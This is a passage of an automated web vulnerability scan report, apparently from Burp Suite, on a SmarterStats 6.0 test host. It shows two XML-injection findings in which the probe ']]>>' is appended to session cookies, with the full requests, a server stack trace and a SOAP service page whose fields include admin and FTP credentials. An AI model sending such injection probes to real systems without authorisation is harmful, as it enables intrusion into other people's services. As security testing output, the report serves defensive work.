$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadStartDate_popupButton","clientStateFieldID":"ctl00_MPH_RadStartDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadStartDate_calendar","dateInput":"ctl00_MPH_RadStartDate_dateInput"}, $get("ctl00_MPH_RadStartDate"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/11/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadEndDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadEndDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadEndDate_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadEndDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadEndDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadEndDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadEndDate_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadEndDate_popupButton","clientStateFieldID":"ctl00_MPH_RadEndDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadEndDate_calendar","dateInput":"ctl00_MPH_RadEndDate_dateInput"}, $get("ctl00_MPH_RadEndDate"));
});
//]]>
</script>
</form>
</body>
</html>


3.15. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the ASP.NET_SessionId cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Services/SiteAdmin.asmx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4]]>>; loginsettings=;

Response

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:13 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

3.16. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The STHashCookie cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the STHashCookie cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Services/SiteAdmin.asmx?op=GetAllSites HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}]]>>; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:02:15 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 28223
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetAllSites</h2>
<p class="intro">Returns all sites listed in the MRS with a single log location</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/GetAllSites' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">IncludeDetails:</td>
<td><input class="frmInput" type="text" size="50" name="IncludeDetails"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetAllSites"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetAllSites xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;IncludeDetails&gt;<font class=value>boolean</font>&lt;/IncludeDetails&gt;
&lt;/GetAllSites&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetAllSitesResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetAllSitesResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteInfo&gt;
&lt;SiteInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteInfo&gt;
&lt;/Sites&gt;
&lt;/GetAllSitesResult&gt;
&lt;/GetAllSitesResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetAllSites xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;IncludeDetails&gt;<font class=value>boolean</font>&lt;/IncludeDetails&gt;
&lt;/GetAllSites&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetAllSitesResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetAllSitesResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteInfo&gt;
&lt;SiteInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
